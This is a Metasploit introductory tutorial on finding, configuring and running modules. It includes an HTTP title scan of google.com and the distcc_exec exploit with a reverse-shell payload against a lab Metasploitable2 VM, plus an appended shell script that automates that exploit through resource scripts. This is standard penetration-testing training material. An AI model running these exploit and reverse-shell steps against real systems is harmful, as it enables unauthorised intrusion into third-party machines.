Introduction to Metasploit
Learn more about the Metasploit framework.
Assuming you now have Metasploit installed, run the msfconsole command to open Metasploit:
msfconsole
Finding Modules
Metasploit is based around the concept of modules. The most commonly used module types are:
- Auxiliary - Auxiliary modules do not exploit a target, but can perform data gathering or administrative tasks
- Exploit - Exploit modules leverage vulnerabilities in a manner that allows the framework to execute arbitrary code on the target host
- Payloads - Arbitrary code that can be executed on a remote target to perform a task, such as creating users, opening shells, etc
- Post - Post modules are used after a machine has been compromised. They perform useful tasks such as gathering, collecting, or enumerating data from a session.
You can use the search command to search for modules:
search type:auxiliary http html title tag
You can use a Metasploit module by specifying the full module name. The prompt will be updated to indicate the currently active module:
Example:
use auxiliary/scanner/http/title
Each module offers configurable options, which can be viewed with the show options command (or its alias, options):
show options
To set a module option, use the set command. We will set the RHOSTS option, which represents the target host(s) that the module will run against:
set RHOSTS google.com
The run command will run the module against the target, showing the target's HTTP title:
run
We can also run modules with options set as part of the run command. For instance, setting both RHOSTS and enabling HttpTrace functionality:
run rhosts=google.com httptrace=true
With HttpTrace enabled there is quite a lot of information in the output, since the full request and response are printed; scroll up to see all of it.
Running exploit modules
Exploit modules require a vulnerable target. It is recommended to set up your own local test environment to run modules against, for instance in a virtual machine or with Docker. There are multiple pre-built vulnerable test environments, including:
- Metasploitable2
- Metasploitable3
For instance, targeting a vulnerable Metasploitable2 VM and using the unix/misc/distcc_exec module:
use unix/misc/distcc_exec
Exploit modules will generally, at a minimum, require the following options to be set:
- RHOSTS - The remote target host(s). RHOST is accepted as an alias for this option.
- LHOST - The listen address that the target will connect back to. Important: this may need to be set to your tun0 IP address or similar if you are connecting to your target over a VPN, because the target must be able to reach it.
- PAYLOAD - The code to be executed after an exploit is successful, for instance creating a user or opening a Metasploit session. Often this can be left as the default value, but it may sometimes require configuration.
As with auxiliary modules, the exploit module's options (including which ones are required) can be viewed with the show options command, or its alias options:
show options
For this scenario you can manually set each of the required option values (RHOSTS, LHOST, and optionally PAYLOAD):
set rhosts 192.168.123.133
set lhost 192.168.123.1
set payload cmd/unix/reverse
The run command will run the module against the target; there is also an aliased exploit command which performs the same action:
run
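Both procedures on this page, running the auxiliary/scanner/http/title scanner and configuring and launching unix/misc/distcc_exec, can be driven without typing at the msf6 prompt by feeding msfconsole a resource script (a file of console commands, loaded with -r). The following POSIX shell script is an added example and is not part of the Metasploit documentation or the framework itself. The target 192.168.123.133, the attacker address 192.168.123.1 and the interface name tun0 are assumed lab values taken from this page, the function names are this example's own, and the check and exploit -z steps it adds are standard msfconsole commands that the page does not cover.

```shell
#!/bin/sh
# Added example (not from the Metasploit docs): build and run msfconsole
# resource scripts for the two workflows on this page. Assumed lab values:
# target 192.168.123.133, attacker 192.168.123.1, VPN interface tun0.
set -eu

# Resolve LHOST from an interface (tun0 when the target is reached over a VPN).
# Falls back to the supplied address when the interface does not exist or the
# ip tool is unavailable, so the script still works on a plain lab host.
lhost_for() {
    iface=$1; fallback=$2
    addr=$(ip -4 -o addr show dev "$iface" 2>/dev/null \
        | awk '{print $4}' | cut -d/ -f1 | head -n1)
    if [ -n "$addr" ]; then
        printf '%s\n' "$addr"
    else
        printf '%s\n' "$fallback"
    fi
}

# Emit a resource script equivalent to the exploit steps on this page.
# `check` runs the module's vulnerability check (when it has one) before any
# exploitation, and `exploit -z` runs the exploit but keeps the resulting
# session in the background instead of dropping you into it.
render_exploit_rc() {
    module=$1; rhosts=$2; lhost=$3; payload=$4
    cat <<EOF
use $module
set RHOSTS $rhosts
set LHOST $lhost
set PAYLOAD $payload
show options
check
exploit -z
sessions -l
EOF
}

# The auxiliary scanner from the first half of the page, with HttpTrace on.
render_aux_rc() {
    rhosts=$1
    cat <<EOF
use auxiliary/scanner/http/title
set RHOSTS $rhosts
set HttpTrace true
run
EOF
}

# Load the resource script with -r; -q suppresses the banner. msfconsole stays
# open afterwards so you can interact with any session that was created.
run_rc() {
    rc=$1
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        echo "msfconsole not found; resource script left at $rc" >&2
    fi
}

main() {
    target=${1:-192.168.123.133}
    lhost=$(lhost_for tun0 192.168.123.1)
    rc=$(mktemp /tmp/distcc.XXXXXX)
    render_exploit_rc unix/misc/distcc_exec "$target" "$lhost" cmd/unix/reverse > "$rc"
    run_rc "$rc"
}

# Only launch msfconsole when explicitly asked: RUN_MSF=1 sh distcc.sh [target]
if [ "${RUN_MSF:-0}" = 1 ]; then
    main "$@"
fi
```

Run it as `RUN_MSF=1 sh distcc.sh 192.168.123.133` from the attacking host. Because the generated script calls check before exploit -z, a target that the module reports as not vulnerable is visible before any payload is sent, and the LHOST lookup avoids the common VPN mistake of advertising an address the target cannot route back to.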
You have now learnt how to find and run modules in Metasploit, as well as how to make some custom configurations.
Last updated 09 Jul 2024, 16:15 +0200.